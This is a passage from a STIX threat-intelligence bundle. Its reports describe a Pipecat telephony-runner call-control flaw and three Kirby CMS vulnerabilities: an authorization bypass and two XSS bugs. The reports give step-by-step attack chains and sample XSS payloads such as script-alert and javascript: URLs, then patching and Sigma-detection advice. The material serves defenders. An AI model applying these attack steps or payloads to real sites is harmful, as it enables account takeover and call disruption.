Handler Access\" and \"Detects CVE-2026-44727 Probing — Suspicious Characters in Jupyter `nbconvert` Path\" to your SIEM for monitoring.\n*   Ensure `webserver` logs are collected and ingested into your security monitoring platform to enable detection of these activities.\n",
      "published": "2026-06-18T15:20:33Z",
      "labels": [
        "xss",
        "web-vulnerability",
        "jupyter",
        "server-side",
        "rce"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--8fa27bd5-d2f2-5f4f-9ce9-673b83944e1c",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-fcw5-x6j4-ccmp"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c0d74a9f-1f32-5ca4-8047-6e11cc4dfc99",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.twilio.com",
      "pattern": "[domain-name:value = 'api.twilio.com']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T15:22:33Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--85dbe260-afec-5c7b-98ee-3ff5a6133c97",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9885fb6c-2a73-5ac0-ac8e-c70b522daabc",
      "target_ref": "indicator--c0d74a9f-1f32-5ca4-8047-6e11cc4dfc99"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3ac44e4e-2e96-5501-bc87-a67e5db9763d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.telnyx.com",
      "pattern": "[domain-name:value = 'api.telnyx.com']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T15:22:33Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--96328e8e-a333-52b3-98ff-315320698b7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9885fb6c-2a73-5ac0-ac8e-c70b522daabc",
      "target_ref": "indicator--3ac44e4e-2e96-5501-bc87-a67e5db9763d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--192c1c9c-b09b-54eb-85c3-a67ef72b18e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.plivo.com",
      "pattern": "[domain-name:value = 'api.plivo.com']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T15:22:33Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--99ecb7f7-bcad-52ed-a968-6c0aa565efeb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9885fb6c-2a73-5ac0-ac8e-c70b522daabc",
      "target_ref": "indicator--192c1c9c-b09b-54eb-85c3-a67ef72b18e7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f79b5c4-c479-5f49-b080-62e0c2dfc72c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9885fb6c-2a73-5ac0-ac8e-c70b522daabc",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1550",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--43343932-645c-5c0f-98ce-5510d3c0976d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9885fb6c-2a73-5ac0-ac8e-c70b522daabc",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--913e74da-d462-59c7-a071-2d95f27ee5d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9885fb6c-2a73-5ac0-ac8e-c70b522daabc",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9885fb6c-2a73-5ac0-ac8e-c70b522daabc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Pipecat Telephony Runner Unauthenticated Call-Control Abuse",
      "description": "## Overview\n\nA missing authorization vulnerability (CWE-862) affects the `pipecat` development runner, specifically its telephony WebSocket `/ws` endpoint. An unauthenticated remote attacker who can reach an exposed `pipecat` runner can connect to this endpoint, which accepts connections without any authentication. By sending a crafted Twilio WebSocket handshake message containing an attacker-supplied `callSid` (e.g., `CAATTACKER1337INJECTED00000000001`), the attacker can trick the server. The runner will then issue an authenticated Twilio REST API hang-up request against that `callSid` using the server operator's own `TWILIO_ACCOUNT_SID` and `TWILIO_AUTH_TOKEN` credentials. Similar vulnerabilities exist for Telnyx and Plivo. Although designed for development and defaulting to `localhost`, `pipecat` runners are often exposed publicly via proxies for telephony provider callbacks, creating a critical attack surface for call disruption and credential abuse.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker identifies an exposed `pipecat` development runner with an accessible `/ws` WebSocket endpoint, typically fronted by a public proxy.\n2.  The attacker establishes an unauthenticated WebSocket connection to the `/ws` endpoint on the `pipecat` runner.\n3.  The attacker sends a crafted Twilio WebSocket \"start\" handshake message, embedding an attacker-controlled `callSid` (e.g., `CAATTACKER1337INJECTED00000000001`) into the JSON payload.\n4.  The `pipecat` runner, lacking authentication checks, accepts the connection and extracts the attacker-supplied `callSid` from the handshake message without validation.\n5.  When the `pipecat` pipeline terminates (e.g., via an `EndFrame` or `CancelFrame`), its `TwilioFrameSerializer` (which defaults `auto_hang_up` to `True`) automatically triggers the `_hang_up_call()` function.\n6.  The `_hang_up_call()` function constructs a Twilio REST API URL, incorporating the attacker-supplied `callSid` into the endpoint (e.g., `api.twilio.com/.../Calls/{attacker_call_sid}.json`).\n7.  The `pipecat` runner then uses its own configured `TWILIO_ACCOUNT_SID` and `TWILIO_AUTH_TOKEN` (from environment variables) to send an authenticated POST request to the constructed Twilio API URL.\n8.  This POST request forcibly terminates the call associated with the attacker-supplied `callSid`, leading to denial of service or abuse of the operator's telephony account.\n\n## Impact\n\nThis vulnerability, categorized as Missing Authorization (CWE-862), allows an unauthenticated network attacker to remotely interact with an exposed `pipecat` development runner. If the runner is configured with live Twilio, Telnyx, or Plivo credentials, the attacker can forcibly terminate active calls by injecting a known or guessed `callSid` into the WebSocket handshake. This leads to denial of service for ongoing communications and enables the attacker to abuse the organization's telephony provider credentials for unauthorized call-control actions. Organizations relying on `pipecat` for telephony integrations that have inadvertently exposed development instances to the public internet are at risk of significant operational disruption and potential compromise of their telephony accounts.\n\n## Recommendation\n\n*   **Review `pipecat` runner deployments**: Ensure `pipecat` development runners are strictly bound to `localhost` or internal, trusted network interfaces, and are not accessible from untrusted networks, as highlighted in the `Overview`.\n*   **Network Monitoring and Blocking**: Monitor outbound connections from `pipecat` runner hosts to telephony API endpoints such as `api.twilio.com`, `api.telnyx.com`, and `api.plivo.com` (listed in IOCs), and implement network filtering or segmentation to restrict such traffic unless explicitly required and carefully configured.\n*   **Detection Engineering**: Deploy the Sigma rule \"Pipecat Telephony Runner Outbound Call Control Request\" from this brief to your SIEM and tune it to identify anomalous outbound call termination requests originating from pipecat processes.\n",
      "published": "2026-06-18T15:22:33Z",
      "labels": [
        "api-security",
        "websocket",
        "telephony",
        "cwe-862",
        "python"
      ],
      "object_refs": [
        "indicator--c0d74a9f-1f32-5ca4-8047-6e11cc4dfc99",
        "indicator--3ac44e4e-2e96-5501-bc87-a67e5db9763d",
        "indicator--192c1c9c-b09b-54eb-85c3-a67ef72b18e7",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-j8cv-x86q-rj85"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Systems",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1213",
          "url": "https://attack.mitre.org/techniques/T1213"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de841381-d631-5645-a049-5683eb58cb5f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7b4b2afa-b4b7-5fcb-ad22-ac684a8d24a6",
      "target_ref": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3d49cce5-3dc2-583a-89f8-25db6baab4c1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7b4b2afa-b4b7-5fcb-ad22-ac684a8d24a6",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0c512adf-4ba1-5ff3-8923-99fc154aecdc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7b4b2afa-b4b7-5fcb-ad22-ac684a8d24a6",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7b4b2afa-b4b7-5fcb-ad22-ac684a8d24a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Kirby CMS Missing Authorization Vulnerability in /api/site/find (CVE-2026-54005)",
      "description": "## Overview\n\nA high-severity missing authorization vulnerability, identified as CVE-2026-54005, affects Kirby CMS in versions up to 4.9.3 and from 5.0.0-alpha.1 up to 5.4.3. This flaw allows authenticated users to bypass `pages.access` permissions and retrieve full content and metadata for arbitrary pages they are not authorized to view. The vulnerability resides in the `/api/site/find` REST API route, which fails to properly check user permissions for queried pages. Discovered by Rizky Muhammad (@EvidentObscurity), this issue could lead to significant sensitive information disclosure, particularly in sites where user roles are configured with granular page access restrictions. The vulnerability does not affect write actions or draft pages, but the ability to enumerate and extract unauthorized published content poses a substantial risk to data confidentiality.\n\n## Attack Chain\n\n1.  An attacker obtains valid credentials for a Kirby CMS user account, potentially through phishing, brute-force, or exploitation of other vulnerabilities.\n2.  The authenticated attacker logs into the Kirby CMS administration panel or directly interacts with the Kirby API.\n3.  The attacker crafts an HTTP GET request targeting the vulnerable `/api/site/find` REST API route.\n4.  The request includes `page IDs` or `UUIDs` of specific pages the attacker wishes to access, even if their assigned role does not grant `pages.access` permission to those pages.\n5.  Due to the missing authorization check (CVE-2026-54005), the Kirby application processes the request without validating the user's `pages.access` rights for the specified pages.\n6.  The server responds with the full content and metadata of the requested published pages, including potentially sensitive information, bypassing the intended access controls.\n7.  The attacker extracts and analyzes the disclosed data, potentially leading to further compromise or sensitive data exfiltration.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54005 leads to the unauthorized disclosure of sensitive information. Attackers can retrieve the full content and metadata of any published page within the affected Kirby CMS, even if their account lacks explicit `pages.access` permissions for those pages. This includes confirming the existence of pages and extracting confidential data stored in page fields. While the vulnerability does not allow for write access or exposure of draft pages, the compromise of information confidentiality can be significant for organizations that rely on Kirby CMS for content management with differentiated access levels. The specific number of victims and sectors affected are not publicly detailed, but any Kirby site with the specified version range and restricted `pages.access` configurations is at risk.\n\n## Recommendation\n\n*   Immediately patch Kirby CMS to version [4.9.4](https://github.com/getkirby/kirby/releases/tag/4.9.4), [5.4.4](https://github.com/getkirby/kirby/releases/tag/5.4.4), or a later version to remediate CVE-2026-54005.\n*   Deploy the provided Sigma rules to your SIEM solution to detect suspicious activity related to the `/api/site/find` endpoint.\n*   Monitor web server access logs for anomalous or high-volume requests targeting the `/api/site/find` route from specific users or IP addresses.\n",
      "published": "2026-06-18T15:24:09Z",
      "labels": [
        "cms",
        "vulnerability",
        "kirby",
        "information-disclosure",
        "api",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-r3w8-2c5r-h9j9"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--65c4fe0a-8452-5fbf-a92d-4c822abdd066",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5254c59f-f064-5746-8f2e-cf0a8443e182",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1078",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c0b66c2-aecb-56e2-a7d4-5964de1add75",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5254c59f-f064-5746-8f2e-cf0a8443e182",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--b5d4e584-6f98-5da6-a027-f93b66f2cf31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Authenticated Panel User"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e0e7f2b-bef0-5355-b7bd-c3688e9c2864",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--5254c59f-f064-5746-8f2e-cf0a8443e182",
      "target_ref": "threat-actor--b5d4e584-6f98-5da6-a027-f93b66f2cf31"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5254c59f-f064-5746-8f2e-cf0a8443e182",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Kirby: Cross-site scripting (XSS) from incomplete HTML/XML sanitization in Dom::sanitize()",
      "description": "## Overview\n\nA high-severity cross-site scripting (XSS) vulnerability, identified as CVE-2026-54002, affects Kirby CMS versions prior to 4.9.4 and between 5.0.0-alpha.1 and 5.4.3. This flaw stems from incomplete HTML/XML sanitization within the `Dom::sanitize()` method, which is integral to the platform's content processing, including `writer` and `list` fields, and `Sane` API functions. An authenticated Panel user can exploit this by injecting malicious markup as children of unknown HTML/XML tags. The `Dom::sanitize()` method fails to correctly sanitize these unwrapped child nodes, allowing the malicious content to be stored and subsequently executed as JavaScript in the browser of other users, including administrators, when they view the affected content in the Panel or on the site frontend. This creates a risk of privilege escalation and other client-side attacks.\n\n## Attack Chain\n\n1.  An authenticated attacker logs into the Kirby CMS Panel with legitimate credentials.\n2.  The attacker navigates to an editable content field, such as a `writer` or `list` field, or interacts with a custom plugin using the `Sane` API functions (`$dom-\u003esanitize()`, `Sane::sanitizeFile()`, etc.).\n3.  The attacker crafts and injects malicious markup, specifically including JavaScript code (e.g., `\u003cscript\u003ealert('XSS')\u003c/script\u003e`) as children of an unknown HTML/XML tag (e.g., `\u003cfoo\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/foo\u003e`).\n4.  The Kirby backend processes the submitted content, invoking the vulnerable `Dom::sanitize()` method.\n5.  Due to the flaw, `Dom::sanitize()` unwraps the unknown parent tag but fails to sanitize the malicious child nodes, allowing the JavaScript payload to be saved unsanitized into the content data.\n6.  Another user, potentially a higher-privileged administrator, accesses the Panel or frontend page where the maliciously injected content is displayed.\n7.  The victim's web browser renders the unsanitized content, leading to the execution of the injected JavaScript within their session context.\n8.  The executed script can steal session cookies, perform unauthorized actions via Kirby's API (e.g., privilege escalation), redirect the user, or deface the interface, compromising the victim's account and potentially the entire CMS.\n\n## Impact\n\nThe vulnerability poses a significant risk to affected Kirby CMS installations, particularly those with multiple authenticated users where some may be untrusted or malicious. Successful exploitation allows for stored XSS, meaning the injected JavaScript persists and executes each time the compromised content is viewed. This can lead to privilege escalation, enabling lower-privileged authenticated users to escalate their access by compromising higher-privileged user sessions (e.g., administrators). The impact can range from session hijacking, data exfiltration through unauthorized API calls to Kirby's backend, to defacement or other client-side attacks affecting any user viewing the malicious content. The advisory notes that content stored before patching may still contain malicious payloads, emphasizing the persistent nature of the threat.\n\n## Recommendation\n\n*   **Patch CVE-2026-54002**: Immediately update Kirby CMS to version 4.9.4, 5.4.4, or a later release to remediate the sanitization flaw.\n*   **Review and Re-sanitize Content**: If untrusted authenticated users had access to the Kirby Panel on a security-critical site, review and re-sanitize all existing content that may have passed through affected fields (e.g., `writer`, `list` fields, or custom code using `Sane` API) for potential malicious payloads.\n*   **Deploy Sigma Rule for XSS Attempts**: Deploy the `Detect CVE-2026-54002 XSS Injection in Kirby Panel` Sigma rule to your webserver logs (category `webserver`) to identify attempts to inject XSS payloads into Kirby content fields.\n*   **Implement WAF/API Security**: Implement a Web Application Firewall (WAF) or API security gateway to block requests containing known XSS patterns targeting CMS editing endpoints, acting as an additional layer of defense.\n",
      "published": "2026-06-18T15:25:22Z",
      "labels": [
        "xss",
        "web-application",
        "cms",
        "kirby-cms"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "threat-actor--b5d4e584-6f98-5da6-a027-f93b66f2cf31"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-wr9h-4r83-f4v6"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4fa5321-da66-5dfc-a4df-e54fa662b5d0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f2c59ea-49a7-5327-a602-f9b2d02ed001",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2274a968-b8c9-5227-af3d-b086fde56d46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f2c59ea-49a7-5327-a602-f9b2d02ed001",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1780dc0-b1ce-5a8f-9457-25d749098af4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f2c59ea-49a7-5327-a602-f9b2d02ed001",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4f2c59ea-49a7-5327-a602-f9b2d02ed001",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Kirby: Self cross-site scripting (self-XSS) in the writer field (CVE-2026-49276)",
      "description": "## Overview\n\nThe Kirby CMS is affected by a high-severity self-cross-site scripting (self-XSS) vulnerability, tracked as CVE-2026-49276, in its writer field. This flaw impacts Kirby sites using the writer field in any blueprint, specifically versions prior to 4.9.4 and versions 5.0.0-alpha.1 through 5.4.3. Attackers can inject malicious `javascript:` URLs into link or email targets within the writer field. While the backend sanitizes these before storage, an authenticated Panel user who enters such a malicious link and then clicks it *before saving the content* will execute the script in their browser. This can lead to the attacker making API requests with the victim's permissions. Successful exploitation typically requires social engineering and knowledge of the content structure, and cannot be automated. Panel plugins directly using the `\u003ck-writer\u003e` component may also be susceptible to stored XSS if they lack proper HTML sanitization.\n\n## Attack Chain\n\n1.  An attacker, with knowledge of the Kirby content structure, gains access to an authenticated Kirby Panel session (e.g., via stolen credentials or an insider threat).\n2.  The attacker navigates to a content page utilizing the `writer` field within the Kirby Panel.\n3.  The attacker crafts a malicious `javascript:` URL payload (e.g., `javascript:alert(document.domain)`) and inputs it into a \"custom\" link or email target within the `writer` field.\n4.  The attacker then socially engineers or persuades another authenticated user (e.g., an administrator) to open the same content page in the Panel.\n5.  The victim user clicks the maliciously crafted `javascript:` link that the attacker previously inserted into the `writer` field, but *before* saving the content changes.\n6.  Upon clicking, the malicious JavaScript code embedded in the link executes within the victim's browser context, operating with the victim's Panel permissions.\n7.  The script can then perform actions such as triggering API requests to Kirby's backend, exfiltrating sensitive session data, or escalating privileges by changing user settings.\n8.  This leads to unauthorized actions being performed under the victim's identity within the Kirby CMS.\n\n## Impact\n\nThis self-XSS vulnerability can lead to significant compromise of the Kirby CMS Panel. If an administrator account is targeted, successful exploitation allows the attacker to execute arbitrary JavaScript within the administrator's browser session. This can facilitate privilege escalation, unauthorized modification of content, data exfiltration from the Panel, or further actions through Kirby's API using the victim's permissions. While primarily self-XSS, Panel plugins using the vulnerable `\u003ck-writer\u003e` component could enable stored XSS, affecting other users or site visitors if not properly sanitized. The attack's effectiveness relies on social engineering, meaning the number of direct victims is hard to quantify but the potential for high impact on targeted individuals or organizations is severe.\n\n## Recommendation\n\n*   Patch CVE-2026-49276 immediately by updating Kirby CMS to version 4.9.4, 5.4.4, or a later release.\n*   Deploy the Sigma rule \"Detects CVE-2026-49276 Exploitation — Kirby Panel JS URL Submission\" to your SIEM to identify attempts at submitting `javascript:` scheme URLs to your Kirby Panel.\n*   Enable comprehensive web server logging, ensuring that full request bodies and URL parameters for POST requests to Kirby Panel endpoints (e.g., `/panel/api/pages/*/fields/writer`) are captured for forensic analysis and detection.\n*   Educate users with Kirby Panel access, especially those with elevated privileges, about the risks of clicking untrusted links within the Panel interface, even if they appear to be self-generated.\n",
      "published": "2026-06-18T15:26:57Z",
      "labels": [
        "xss",
        "self-xss",
        "web-vulnerability",
        "kirby",
        "cms"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-rhj6-r49h-5932"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--99d26e41-2855-502b-bf8c-60077458ca8a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/MervinPraison/PraisonAI",
      "pattern": "[url:value = 'https://github.com/MervinPraison/PraisonAI']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T23:29:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dc1f6292-ebaf-5a46-9f4b-954f34d4480e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "target_ref": "indicator--99d26e41-2855-502b-bf8c-60077458ca8a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2e7c10fa-c5ab-57df-8631-3ac88b2aebca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-766v-q9x3-g744",
      "pattern": "[url:value = 'https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-766v-q9x3-g744']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T23:29:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d1e4f9a3-017b-55e5-8ccd-c139ca49c863",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "target_ref": "indicator--2e7c10fa-c5ab-57df-8631-3ac88b2aebca"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c2398054-49d6-5ddc-81b5-aca1d02892a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/praisonai-arbitrary-file-read-and-write-via-path-traversal-in-multiagentmonitor",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/praisonai-arbitrary-file-read-and-write-via-path-traversal-in-multiagentmonitor']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T23:29:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9a2b756c-529f-55bc-bceb-820af65ef739",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
